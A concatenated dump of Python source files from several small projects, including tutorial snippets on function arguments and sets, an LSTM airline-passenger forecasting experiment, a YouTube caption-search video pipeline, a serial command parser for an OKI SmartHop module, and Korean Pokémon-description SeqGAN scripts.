# print(powerDefault(5))
# 25
'''
设置默认参数时,有几点要注意:
一是必选参数在前,默认参数在后,
否则Python的解释器会报错(思考一下为什么默认参数不能放在必选参数前面);
二是如何设置默认参数。
当函数有多个参数时,把变化大的参数放前面,变化小的参数放后面。
变化小的参数就可以作为默认参数。
使用默认参数有什么好处?最大的好处是能降低调用函数的难度。
定义默认参数要牢记一点:默认参数必须指向不变对象!
'''
def add_end(L=[]):
s = []
L.append('END')
return L
# print(add_end())
# print(add_end())
# ['END']
# ['END', 'END']
# def addToEnd(L=None):
# if L is None:
# L = []
# L.append('END')
# return L
#
# print(addToEnd())
# print(addToEnd())
# ['END']
# ['END']
# 要定义出这个函数,我们必须确定输入的参数。
# 由于参数个数不确定,我们首先想到可以把a,b,c……作为一个list或tuple传进来,
# 这样,函数可以定义如下
# 定义可变参数和定义一个list或tuple参数相比,仅仅在参数前面加了一个*号。
# 在函数内部,参数numbers接收到的是一个tuple,因此,函数代码完全不变。但是,调用该函数时,可以传入任意个参数,包括0个参数:
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3, 5]))
'''
Python的函数具有非常灵活的参数形态,既可以实现简单的调用,又可以传入非常复杂的参数。
默认参数一定要用不可变对象,如果是可变对象,程序运行时会有逻辑错误!
要注意定义可变参数和关键字参数的语法:
*args是可变参数,args接收的是一个tuple;
**kw是关键字参数,kw接收的是一个dict。
以及调用函数时如何传入可变参数和关键字参数的语法:
可变参数既可以直接传入:func(1, 2, 3),又可以先组装list或tuple,再通过*args传入:func(*(1, 2, 3));
关键字参数既可以直接传入:func(a=1, b=2),又可以先组装dict,再通过**kw传入:func(**{'a': 1, 'b': 2})。
使用*args和**kw是Python的习惯写法,当然也可以用其他参数名,但最好使用习惯用法。
命名的关键字参数是为了限制调用者可以传入的参数名,同时可以提供默认值。
定义命名的关键字参数在没有可变参数的情况下不要忘了写分隔符*,否则定义的将是位置参数。
'''
```
#### File: python/Set/Set.py
```python
setDays = set()
print(setDays)
# set()
print(type(setDays))
# <class 'set'>
setDays.add('Monday')
print(setDays)
# {'Monday'}
setCopyDays = setDays.copy()
print(setCopyDays)
setCopyDays.add('Friday')
print(setDays)
# {'Monday'}
print(setCopyDays)
# {'Friday', 'Monday'}
print(setDays.difference(setCopyDays))
# set()
print(setCopyDays.difference(setDays))
# {'Friday'}
``` |
{
"source": "553269487/ConvLSTM-on-TIANCHI-CIKM-2017",
"score": 3
} |
#### File: 553269487/ConvLSTM-on-TIANCHI-CIKM-2017/model.py
```python
from torch import nn
import torch.nn.functional as F
import torch
class activation():
def __init__(self, act_type, negative_slope=0.2, inplace=True):
super().__init__()
self._act_type = act_type
self.negative_slope = negative_slope
self.inplace = inplace
def __call__(self, input):
if self._act_type == 'leaky':
return F.leaky_relu(input, negative_slope=self.negative_slope, inplace=self.inplace)
elif self._act_type == 'relu':
return F.relu(input, inplace=self.inplace)
elif self._act_type == 'sigmoid':
return torch.sigmoid(input)
else:
raise NotImplementedError
class ED(nn.Module):
def __init__(self, encoder, decoder):
super().__init__()
self.encoder = encoder
self.decoder = decoder
def forward(self, input):
state = self.encoder(input) #encode-->hidden state
output = self.decoder(state)#hidden state--》decode
return output
``` |
{
"source": "555holy/yt-concate",
"score": 2
} |
#### File: yt-concate/yt_concate/main.py
```python
import sys
import getopt
import logging
from distutils.util import strtobool
from yt_concate import log
from yt_concate.pipeline.steps.preflight import Preflight
from yt_concate.pipeline.steps.get_video_list import GetVideoList
from yt_concate.pipeline.steps.initialize_yt import InitializeYT
from yt_concate.pipeline.steps.download_captions import DownloadCaptions
from yt_concate.pipeline.steps.read_caption import ReadCaption
from yt_concate.pipeline.steps.search import Search
from yt_concate.pipeline.steps.download_videos import DownloadVideos
from yt_concate.pipeline.steps.edit_video import EditVideo
from yt_concate.pipeline.steps.postflight import Postflight
from yt_concate.pipeline.pipeline import Pipeline
from yt_concate.utils import Utils
CHANNEL_ID = 'UCKSVUHI9rbbkXhvAXK-2uxA'
def print_usage():
print('python yt-concate.py OPTIONS')
print('OPTIONS:')
print('{:>6} {:>12}{}'.format('-c', '--channel_id', 'Channel id for YouTube to download videos'))
print('{:>6} {:>12}{}'.format('-s', '--search_word', 'Search the selected word in the video lists'))
print('{:>6} {:>12}{}'.format('-l', '--limit', 'Set the limit of the videos about to download'))
print('{:>6} {:>12}{}'.format('-o', '--output_file_replacement', 'this will ask you if you wanna replace the '
'already-existed output file with a new one '))
print('{:>6} {:>12}{}'.format('-f', '--fast', 'Ignore captions and video files already existed'))
print('{:>6} {:>12}{}'.format('', '--clean_up', 'Delete all the files produced by this project'))
print('{:>6} {:>12}{}'.format('', '--logging_level', 'Set a logging level for logger writing in yt_concate.log'))
def main(argv):
steps = [
Preflight(),
GetVideoList(),
InitializeYT(),
DownloadCaptions(),
ReadCaption(),
Search(),
DownloadVideos(),
EditVideo(),
Postflight(),
]
inputs = {
'channel_id': 'UCKSVUHI9rbbkXhvAXK-2uxA',
'search_word': '<PASSWORD>',
'limit': 20,
'output_file_replacement': True,
'fast': True,
'clean_up': False,
'logging_level': logging.DEBUG,
}
short_opts = "hc:s:l:o:f:"
long_opts = "channel_id= search_word= limit= output_file_replacement= fast= clean_up= logging_level= ".split()
try:
opts, args = getopt.getopt(argv, short_opts, long_opts)
except getopt.GetoptError:
print()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('python main -c <channel_id> -s <search_word> -l<limit>')
sys.exit(0)
elif opt in ("-c", "--channel_id"):
inputs['channel_id'] = arg
elif opt in ("-s", "--search_word"):
inputs['search_word'] = arg
elif opt in ("-l", "--limit"):
inputs['limit'] = bool(strtobool(arg))
elif opt in ("-o", "--output_file_replacement"):
inputs['output_file_replacement'] = bool(strtobool(arg))
elif opt in ("-f", "--fast"):
inputs['fast'] = bool(strtobool(arg))
elif opt in "--clean_up":
inputs['clean_up'] = bool(strtobool(arg))
elif opt in "--logging_level":
inputs['logging_level'] = eval(f'log.{arg}')
log.config_logger(inputs['logging_level'])
utils = Utils()
p = Pipeline(steps)
p.run(inputs, utils)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: pipeline/steps/download_captions.py
```python
import time
import concurrent.futures
import logging
from pytube import YouTube
from yt_concate.pipeline.steps.step import Step
class DownloadCaptions(Step):
def process(self, data, inputs, utils):
logger = logging.getLogger('yt_concate.log.' + __name__)
start = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=15) as executor:
for yt in data:
if inputs['fast']:
if utils.caption_file_exists(yt):
logger.info(f'found downloaded caption files: {yt.id}')
continue
executor.submit(self.download_captions, yt)
end = time.time()
logger.info(f'took {end - start} seconds')
return data
def download_captions(self, yt):
logger = logging.getLogger('yt_concate.log.' + __name__)
try:
source = YouTube(yt.url)
caption = source.captions.get_by_language_code('a.en')
en_caption_convert_to_srt = caption.generate_srt_captions()
text_file = open(yt.caption_filepath, "w", encoding='utf-8')
text_file.write(en_caption_convert_to_srt)
text_file.close()
logger.info(f'successfully downloaded captions for : {yt.url}')
except (KeyError, AttributeError):
logger.info(f'An error when downloading captions for : {yt.url}')
```
#### File: pipeline/steps/initialize_yt.py
```python
from .step import Step
from yt_concate.model.yt import YT
class InitializeYT(Step):
def process(self, data, inputs, utils):
return [YT(url)for url in data]
```
#### File: yt-concate/yt_concate/utils.py
```python
import os
import shutil
import sys
import logging
from yt_concate.settings import DOWNLOADS_DIR
from yt_concate.settings import VIDEOS_DIR
from yt_concate.settings import CAPTIONS_DIR
from yt_concate.settings import OUTPUTS_DIR
class Utils:
def __init__(self):
pass
def create_dirs(self):
os.makedirs(DOWNLOADS_DIR, exist_ok=True)
os.makedirs(VIDEOS_DIR, exist_ok=True)
os.makedirs(CAPTIONS_DIR, exist_ok=True)
os.makedirs(OUTPUTS_DIR, exist_ok=True)
def get_video_list_filepath(self, channel_id):
return os.path.join(DOWNLOADS_DIR, channel_id + '.txt')
def video_list_file_exists(self, channel_id):
filepath = self.get_video_list_filepath(channel_id)
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def caption_file_exists(self, yt):
filepath = yt.caption_filepath
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def video_file_exists(self, yt):
filepath = yt.video_filepath
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def get_output_filepath(self, channel_id, search_word):
filename = f'{channel_id}_{search_word}.mp4'
return os.path.join(OUTPUTS_DIR, filename)
def output_file_exists(self, channel_id, search_word):
filepath = self.get_output_filepath(channel_id, search_word)
return os.path.exists(filepath) and os.path.getsize(filepath) > 0
def output_file_replacement_check(self, channel_id, search_word):
logger = logging.getLogger('yt_concate.log.' + __name__)
if self.output_file_exists(channel_id, search_word):
a = input('output file has already existed, still want to proceed ? (Y/N) ')
if a == 'Y' or a == 'y':
logger.info('processing')
elif a == 'N' or a == 'n':
logger.info('stop running')
sys.exit(0)
def delete_downloaded_files(self, channel_id):
shutil.rmtree(DOWNLOADS_DIR)
shutil.rmtree(OUTPUTS_DIR)
os.remove(self.get_video_list_filepath(channel_id))
``` |
{
"source": "556adarah/smarthop",
"score": 3
} |
#### File: smarthop/sr920/command.py
```python
import enum
import json
import logging
import pkgutil
from smarthop import sr920
_logger = logging.getLogger(__name__)
_templates = json.loads(pkgutil.get_data("smarthop", "sr920/commands.json"))
class SR920Command:
"""Represents the OKI SmartHop SR module API command.
Args:
command_id: A value of the SR920CommandId enum.
parameters: A dict object representing the API command parameters.
"""
def __init__(self, command_id, parameters=None):
_logger.debug(
"enter __init__(): command_id=%s, parameters=%s", command_id, parameters
)
self._command_id = command_id
self._parameters = parameters if parameters else {}
self._template = None
@property
def command_id(self):
"""Gets an identifier of the API command."""
return self._command_id
@property
def parameters(self):
"""Gets a dict object representing the API command parameters."""
return self._parameters
def to_bytes(self):
"""Converts to a bytes object representing the API command.
Returns:
A bytes object representing the API command.
"""
_logger.debug("enter to_bytes()")
command = bytearray(self.command_id.value.to_bytes(2, "big"))
if not self._template:
self._template = SR920Command._get_template(self.command_id)
if self._template and "parameters" in self._template:
command.extend(
SR920Command._pack_parameters(
self.parameters, self._template["parameters"]
)
)
return command
@classmethod
def parse(cls, data):
"""Converts the specified bytes object to an instance of the SR920Command class.
Args:
data: a bytes object to parse.
Returns:
An instance of the SR920Command class.
"""
_logger.debug("enter parse(): data=%s", data)
command_id = sr920.SR920CommandId(int.from_bytes(data[:2], byteorder="big"))
parameters = {}
payload = data[2:] if len(data) > 2 else None
template = cls._get_template(command_id)
if template and "parameters" in template:
cls._unpack_parameters(parameters, payload, template["parameters"])
return cls(command_id, parameters)
@staticmethod
def _get_template(command_id):
_logger.debug("enter _get_template(): command_id=%s", command_id)
for template in _templates["commands"]:
if template["name"] == command_id.name:
return template
_logger.warning("command template not found: command_id=%s", command_id)
return None
@classmethod
def _pack_parameters(cls, parameters, templates):
_logger.debug(
"enter _pack_parameters(): parameters=%s, templates=%s",
parameters,
templates,
)
data = bytearray()
for template in templates:
temp_type = template["type"]
if temp_type.startswith("select:"):
if temp_type[7:] not in parameters:
raise AttributeError(
"select variable not found: %s" % temp_type[7:]
)
param_case = parameters[temp_type[7:]]
# use name if select variable is an instance of Enum
if isinstance(param_case, enum.Enum):
param_case = param_case.name
default_case = None
for temp_case in template["cases"]:
if "default" in temp_case:
default_case = temp_case["default"]
elif param_case in temp_case["case"]:
data.extend(
cls._pack_parameters(parameters, temp_case["parameters"])
)
default_case = None
break
if default_case:
data.extend(cls._pack_parameters(parameters, default_case))
continue
if temp_type.startswith("ref:"):
if temp_type[4:] not in _templates["definitions"]:
raise AttributeError("reference not found: %s" % temp_type[4:])
reference = _templates["definitions"][temp_type[4:]]
data.extend(cls._pack_parameters(parameters, reference))
continue
if "value" in template:
param_value = template["value"]
else:
if template["name"] not in parameters:
raise AttributeError("parameter not found: %s" % template["name"])
param_value = parameters[template["name"]]
temp_len = template["length"] if "length" in template else 1
temp_endian = template["byteorder"] if "byteorder" in template else "big"
if temp_type == "bool":
if param_value:
if "true-value" in template:
param_value = int(template["true-value"], 16)
else:
if "false-value" in template:
param_value = int(template["false-value"], 16)
data.extend(param_value.to_bytes(temp_len, temp_endian))
elif temp_type == "int":
temp_signed = template["signed"] if "signed" in template else False
data.extend(
param_value.to_bytes(temp_len, temp_endian, signed=temp_signed)
)
elif temp_type == "str":
param_bytes = param_value.encode("ascii")
if temp_endian == "little":
param_bytes = param_bytes[::-1]
data.extend(param_bytes)
elif temp_type == "hex":
data.extend(int(param_value, 16).to_bytes(temp_len, temp_endian))
elif temp_type == "object":
data.extend(
SR920Command._pack_parameters(param_value, template["properties"])
)
elif temp_type == "array":
for item in param_value:
data.extend(
SR920Command._pack_parameters(
{template["items"]["name"]: item}, [template["items"]]
)
)
elif temp_type.startswith("enum:"):
data.extend(param_value.value.to_bytes(temp_len, temp_endian))
else: # bytes
data.extend(param_value)
return data
@classmethod
def _unpack_parameters(cls, parameters, data, templates):
_logger.debug(
"enter _unpack_parameters(): parameters=%s, data=%s, templates=%s",
parameters,
data,
templates,
)
for template in templates:
temp_type = template["type"]
if temp_type.startswith("select:"):
if temp_type[7:] not in parameters:
raise AttributeError(
"select variable not found: %s" % temp_type[7:]
)
param_case = parameters[temp_type[7:]]
# use name if select variable is an instance of Enum
if isinstance(param_case, enum.Enum):
param_case = param_case.name
default_case = None
for temp_case in template["cases"]:
if "default" in temp_case:
default_case = temp_case["default"]
elif param_case in temp_case["case"]:
(parameters, data) = cls._unpack_parameters(
parameters, data, temp_case["parameters"]
)
default_case = None
break
if default_case:
(parameters, data) = cls._unpack_parameters(
parameters, data, default_case
)
continue
if temp_type.startswith("ref:"):
if temp_type[4:] not in _templates["definitions"]:
raise AttributeError("reference not found: %s" % temp_type[4:])
reference = _templates["definitions"][temp_type[4:]]
(parameters, data) = cls._unpack_parameters(parameters, data, reference)
continue
if "length" in template:
param_bytes = data[: template["length"]]
data = data[template["length"] :]
else:
param_bytes = data
data = None
if "value" in template:
continue
temp_name = template["name"]
temp_endian = template["byteorder"] if "byteorder" in template else "big"
# invert data if little endian
if temp_endian == "little":
param_bytes = param_bytes[::-1]
if temp_type == "bool":
if (
"true-value" in template
and param_bytes.hex() == template["true-value"]
):
param_bytes = b"\x01"
elif (
"false-value" in template
and param_bytes.hex() == template["false-value"]
):
param_bytes = b"\x00"
parameters[temp_name] = bool(int.from_bytes(param_bytes, "big"))
elif temp_type == "int":
temp_signed = template["signed"] if "signed" in template else False
parameters[temp_name] = int.from_bytes(
param_bytes, "big", signed=temp_signed
)
elif temp_type == "str":
parameters[temp_name] = param_bytes.decode("ascii")
elif temp_type == "hex":
parameters[temp_name] = param_bytes.hex()
elif temp_type == "object":
(parameters[temp_name], data) = cls._unpack_parameters(
{}, param_bytes, template["properties"]
)
elif temp_type == "array":
parameters[temp_name] = []
while param_bytes:
(params, param_bytes) = cls._unpack_parameters(
{}, param_bytes, [template["items"]]
)
parameters[temp_name].extend(params.values())
elif temp_type.startswith("enum:"):
enum_type = getattr(sr920.enums, temp_type[5:])
parameters[temp_name] = enum_type(int.from_bytes(param_bytes, "big"))
else: # bytes
parameters[temp_name] = param_bytes
return parameters, data
def __str__(self):
# _logger.debug("enter __str__()")
return "SR920Command: command_id=%s, parameters=%s" % (
self.command_id,
self.parameters,
)
``` |
{
"source": "55708r/ANCM-Mini-Project",
"score": 3
} |
#### File: 55708r/ANCM-Mini-Project/predict airflight passengers1 - Copy (2).py
```python
import math
import matplotlib.pyplot as plt
import numpy as np
from keras.layers import LSTM, Dense, Dropout
from keras.models import Sequential
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from sklearn.preprocessing import MinMaxScaler
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
# fix random seed for reproducibility
np.random.seed(7)
# load the dataset
dataframe = read_csv('airline-passengers.csv', usecols=[1], engine='python')
dataset = dataframe.values
dataset = dataset.astype('float32')
# normalize the dataset
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# split into train and test sets
train_size = int(len(dataset) * 0.67)
test_size = len(dataset) - train_size
train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]
# reshape into X=t and Y=t+1
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
# reshape input to be [samples, time steps, features]
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
drop = 0.0 #set dropout value
rmses = []
rmsesT = []
varrmses = []
varrmsesT = []
for j in range(10):
rmse =[]
rmseT =[]
print(drop)
for i in range(10):
print(i)
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
# reshape input to be [samples, time steps, features]
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
#create and fit the LSTM network
model = Sequential()
model.add(LSTM(4, input_shape=(1, look_back), return_sequences=True))
model.add(Dropout(drop))
model.add(LSTM(4, input_shape=(1, look_back)))
model.add(Dropout(drop))
model.add(Dense(1))
## Adding the output layer
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=100, batch_size=1, verbose=2)
# make predictions
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
# invert predictions
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
# calculate root mean squared error
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
rmse.append(trainScore)
rmseT.append(testScore)
i = i+1
varrmses.append(rmse) #add rmse scores (10) for a given dropout value
varrmsesT.append(rmseT) #add rmse scores for a given dropout value
meanrmse = np.mean(rmse)
meanrmseT =np.mean(rmseT)
rmses.append(meanrmse)
rmsesT.append(meanrmseT)
drop = drop+0.1
j = j+1
print(varrmses)
print(varrmsesT)
print(rmses)
print(rmsesT)
#shift train predictions for plotting
#trainPredictPlot = np.empty_like(dataset)
#trainPredictPlot[:, :] = np.nan
#trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
#shift test predictions for plotting
#testPredictPlot = np.empty_like(dataset)
#testPredictPlot[:, :] = np.nan
#testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
# plot baseline and predictions
#plt.plot(scaler.inverse_transform(dataset))
#plt.plot(trainPredictPlot)
#plt.plot(testPredictPlot)
#plt.xlabel('Number of airflight passengers in this month (t) in thousands', fontsize = 11)
#plt.ylabel('Number of airflight passengers in next month (t+1) in thousands', fontsize = 11)
#plt.title('Prediction of airflight passenger numbers by a single-layer LSTM', fontsize=14)
#plt.show()
#plt.savefig('Airflight predictions for dropout value 0.7.png')
np.save('Train RMSE scores per dropout value', varrmses)
np.save('Test RMSE scores per dropout value', varrmsesT)
np.save('Train RMSE scores per dropout value averaged over 10 runs', rmses)
np.save('Test RMSE scores per dropout value averaged over 10 runs', rmsesT)
``` |
{
"source": "557mp/pk_story",
"score": 3
} |
#### File: pk_story/0_web_crawler/load_crawling_data.py
```python
import glob
import pandas as pd
import numpy as np
import re
from konlpy.tag import Kkma
from konlpy.utils import pprint
import pickle
import os
import csv
path = './data/'
filenames = glob.glob(path + "/*.csv")
frame = pd.DataFrame()
list_ = []
for file_ in filenames:
df = pd.read_csv(file_, index_col=None)
list_.append(df)
frame = pd.concat(list_)
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
# exchange type1 and type2 and make new_type
# convert 비행 and 노말
def Type(type1, type2):
if type1 == '노말' and type2 == type2:
return type2
elif type2 == '비행':
return '비행'
else:
return type1
# convert jsut 비행
def Type2(type1, type2):
if type2 == '비행':
return '비행'
else:
return type1
frame['new_type'] = frame[['type1','type2']].apply(lambda x: Type(x['type1'], x['type2']), axis=1)
# frame.head(10)
poke_type_list = list(frame['new_type'].value_counts().index)
# 타입, 타입에 따른 전체 포켓몬, 사용되는 포켓몬, 문장수, 제외시킨 포켓몬 수
info_data = pd.DataFrame(columns=('type', 'poke_cnt', 'useful_poke', 'sentence_cnt', 'extract_poke'))
special_data = [] # extract poke_name, sentence # 제외시킨 데이터 저장
type_dict = dict()
for poke_type in poke_type_list:
new_data = []
poke_name = []
etc_poke = []
print("....devide by {} type poketmon ...".format(poke_type))
print("poketmon counts....{}".format(len(frame[frame['new_type']==poke_type])))
# get desc by type
print(".... get desc by {} type....".format(poke_type))
for desc in frame.loc[frame['new_type']== poke_type, ['name', 'desc']].values.tolist():
if '(' in desc[1]:
special_data += desc
etc_poke.append(desc[0])
else:
poke_name.append(desc[0])
new_data += re.sub(r"[^ㄱ-힣a-zA-Z0-9.]+", ' ', desc[1]).strip().split('.')
# make uniq sentence
print("....extract uniq sentence....")
new_data = list(set(new_data))
new_data.remove('')
print("Number of sentence .... {}".format(len(new_data)))
# to word to pos
print("....convert to pos....")
kkma = Kkma()
pos_sentence = []
for sentence in new_data:
pos_sentence += [kkma.pos(sentence)]
print("....add dict....")
# add to dict
type_dict[poke_type] = pos_sentence
# make info data
info_data = info_data.append([{'type': poke_type,
'poke_cnt': len(frame[frame['new_type']==poke_type]),
'useful_poke': len(poke_name),
'sentence_cnt': len(new_data),
'extract_poke': len(etc_poke)}], ignore_index=True)
# break
DATA_PATH = "./data/"
if not os.path.isdir(DATA_PATH):
os.mkdir(DATA_PATH)
_save_pickle(DATA_PATH + 'type_dict.pickle', type_dict)
info_data.to_csv(DATA_PATH + "pk_info_data.csv", index=False, quotechar='"', encoding='utf-8-sig', quoting=csv.QUOTE_NONNUMERIC)
# a = open('type_dict.pickle', 'rb')
# type_dict_load = pickle.load(a)
```
#### File: pk_story/2_seqgan/create_word2vec.py
```python
import pandas as pd
import re
import collections
#from konlpy.tag import Twitter, Kkma
import pickle
import collections
import random
import numpy as np
import os
from gensim.models.word2vec import Word2Vec
def _save_pickle(path, data):
# save pkl
f = open(path, 'wb')
pickle.dump(data, f)
f.close()
# data 불러옴
print("Load real data ...")
a = open('./data/pk_real_data.pkl', 'rb')
sentences = pickle.load(a)
# pk_idx2pos.pkl
a = open('./data/pk_idx2pos.pkl', 'rb')
idx2pos = pickle.load(a)
# pk_pos2idx.pkl
a = open('./data/pk_pos2idx.pkl', 'rb')
pos2idx = pickle.load(a)
sentence_idx = []
for sentence in sentences:
words = []
for word in sentence:
words.append(pos2idx[word[0]])
sentence_idx.append(words)
sentences_words = []
for sen in sentence_idx:
sentence = []
for pos_idx in sen:
sentence.append(idx2pos[pos_idx])
sentences_words.append(sentence)
# word2vec 학습
print("Training word2vec ...")
model = Word2Vec(sentences_words, size=30, window=5,min_count=0, workers=4, iter=10, sg=1)
# word2vec 테스트
print("Test word2vec ...")
print(model.most_similar("불"))
# word2vec에 <start>, UNK 등 추가 후 numpy로 저장
key = list(pos2idx.keys())
w2v = []
for k in key:
if k == '<start>' or k == 'UNK' or k == '후다':
print(k)
w2v.append(np.random.randn(30)*0.1)
else:
w2v.append(model.wv[k])
w2v=np.array(w2v)
_save_pickle('./data/pk_embedding_vec.pkl', w2v)
print("Save word2vec !")
# pk_embedding_vec.pkl
a = open('./data/pk_embedding_vec.pkl', 'rb')
w2v_load = pickle.load(a)
print(np.shape(w2v_load))
print(w2v_load)
```
#### File: pk_story/2_seqgan/sequence_gan_load_test.py
```python
import numpy as np
import tensorflow as tf
import random
from dataloader import Gen_Data_loader, Dis_dataloader
from generator import Generator
from discriminator import Discriminator
from rollout import ROLLOUT
import pickle
#########################################################################################
# Generator Hyper-parameters
######################################################################################
EMB_DIM = 30 # embedding dimension (pretrained: 200, pk: 30)
HIDDEN_DIM = 300 # hidden state dimension of lstm cell
SEQ_LENGTH = 30 # sequence length
START_TOKEN = 0
PRE_EPOCH_NUM = 120 # supervise (maximum likelihood estimation) epochs
SEED = 88
BATCH_SIZE = 64
#########################################################################################
# Discriminator Hyper-parameters
#########################################################################################
dis_embedding_dim = EMB_DIM
dis_filter_sizes = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 30]
dis_num_filters = [100, 200, 200, 200, 200, 100, 100, 100, 100, 100, 160, 160]
dis_dropout_keep_prob = 0.75
dis_l2_reg_lambda = 0.2
dis_batch_size = 64
#########################################################################################
# Basic Training Parameters
#########################################################################################
TOTAL_BATCH = 200
generated_num = 1000
sample_num = 10
# original seqgan parameter
# HIDDEN_DIM = 32
# PRE_EPOCH_NUM = 120
# TOTAL_BATCH = 200
# generated_num = 10000
positive_file = './data/3_pk_data_index.txt'
negative_file = 'save/negative_sample.txt'
eval_file = 'save/eval_file.txt'
# "pretrain" or "poke"
embed_flag = "poke"
a = open('./data/3_pk_data_index.pkl', 'rb')
real_data = pickle.load(a)
a = open('./data/pk_pos2idx.pkl', 'rb')
vocab_to_int = pickle.load(a)
a = open('./data/pk_idx2pos.pkl', 'rb')
int_to_vocab = pickle.load(a)
if embed_flag == "pretrain":
a = open('./data/pretrain_embedding_vec.pkl', 'rb')
elif embed_flag == "poke":
a = open('./data/pk_embedding_vec.pkl', 'rb')
word_embedding_matrix = pickle.load(a)
word_embedding_matrix = word_embedding_matrix.astype(np.float32)
# a = open('./data/word_dict.pickle', 'rb')
# word_dict = pickle.load(a)
real_data_vocab = [[int_to_vocab[i] for i in sample if int_to_vocab[i] != '<PAD>'] for sample in real_data]
real_data_vocab = [' '.join(sample) for sample in real_data_vocab]
print(len(real_data_vocab))
def generate_samples(sess, trainable_model, batch_size, generated_num, output_file, word_embedding_matrix):
# Generate Samples
generated_samples = []
for _ in range(int(generated_num / batch_size)):
generated_samples.extend(trainable_model.generate(sess, word_embedding_matrix))
with open(output_file, 'w') as fout:
for poem in generated_samples:
buffer = ' '.join([str(x) for x in poem]) + '\n'
fout.write(buffer)
def pre_train_epoch(sess, trainable_model, data_loader, word_embedding_matrix):
# Pre-train the generator using MLE for one epoch
supervised_g_losses = []
data_loader.reset_pointer()
for it in range(data_loader.num_batch):
batch = data_loader.next_batch()
_, g_loss = trainable_model.pretrain_step(sess, batch, word_embedding_matrix)
supervised_g_losses.append(g_loss)
return np.mean(supervised_g_losses)
def make_sample(eval_file, int_to_vocab, sample_num):
samples = []
with open(eval_file, 'r') as f:
for line in f:
line = line.strip()
line = line.split()
parse_line = [int(x) for x in line]
samples.append(parse_line)
sample_int = samples[:sample_num]
sample_vocab = [[int_to_vocab[i] for i in sample] for sample in sample_int]
sample_vocab = [' '.join(sample) for sample in sample_vocab]
return sample_vocab
################################## main() #########################################
# load model path (./chekckpoint)
load_model_path = './checkpoint/test5_pkembed/seqGAN_ours'
tf.reset_default_graph()
random.seed(SEED)
np.random.seed(SEED)
gen_data_loader = Gen_Data_loader(BATCH_SIZE, SEQ_LENGTH)
vocab_size = len(vocab_to_int) # 6447
print(vocab_size)
dis_data_loader = Dis_dataloader(BATCH_SIZE, SEQ_LENGTH)
generator = Generator(vocab_size, BATCH_SIZE, EMB_DIM, HIDDEN_DIM, SEQ_LENGTH, START_TOKEN)
discriminator = Discriminator(sequence_length=SEQ_LENGTH, num_classes=2, word_embedding_matrix=word_embedding_matrix,
embedding_size=dis_embedding_dim, filter_sizes=dis_filter_sizes,
num_filters=dis_num_filters, l2_reg_lambda=dis_l2_reg_lambda)
rollout = ROLLOUT(generator, 0.8, word_embedding_matrix)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
print('#########################################################################')
print('Restore Trained Seqgan parameters...')
saver.restore(sess, load_model_path)
print("Model restored.")
# Generate samples using Trained Model
generate_samples(sess, generator, BATCH_SIZE, generated_num, eval_file, word_embedding_matrix)
samples = make_sample(eval_file, int_to_vocab, generated_num)
samples = [[word for word in sample.split() if word != 'UNK'] for sample in samples]
samples = [' '.join(sample) for sample in samples]
f = open('./save/eval_seqgan_vocab.txt', 'w')
for token in samples:
token = token + '\n'
f.write(token)
f.close()
```
#### File: pk_story/3_conditional_seqgan/generator.py
```python
import tensorflow as tf
from tensorflow.python.ops import tensor_array_ops, control_flow_ops
class Generator(object):
def __init__(self, num_emb, batch_size, emb_dim, hidden_dim,
sequence_length, start_token, type_size,
learning_rate=0.01, reward_gamma=0.95):
self.num_emb = num_emb
self.batch_size = batch_size
self.emb_dim = emb_dim
self.hidden_dim = hidden_dim
self.sequence_length = sequence_length
self.start_token = tf.constant([start_token]*self.batch_size, dtype=tf.int32)
self.word_embedding_matrix = tf.placeholder(dtype=tf.float32, shape=[num_emb, emb_dim], name='word_embed')
self.type_size = type_size
self.learning_rate = tf.Variable(float(learning_rate), trainable=False)
self.reward_gamma = reward_gamma
self.g_params = []
self.d_params = []
self.temperature = 1.0
self.grad_clip = 5.0
self.expected_reward = tf.Variable(tf.zeros([self.sequence_length]))
with tf.variable_scope('generator'):
self.g_embeddings = self.word_embedding_matrix
self.g_recurrent_unit = self.create_recurrent_unit(self.g_params) # maps h_tm1 to h_t for generator
self.g_output_unit = self.create_output_unit(self.g_params) # maps h_t to o_t (output token logits)
# placeholder definition
self.x = tf.placeholder(tf.int32, shape=[self.batch_size, self.sequence_length]) # sequence of tokens generated by generator
self.rewards = tf.placeholder(tf.float32, shape=[self.batch_size, self.sequence_length]) # get from rollout policy and discriminator
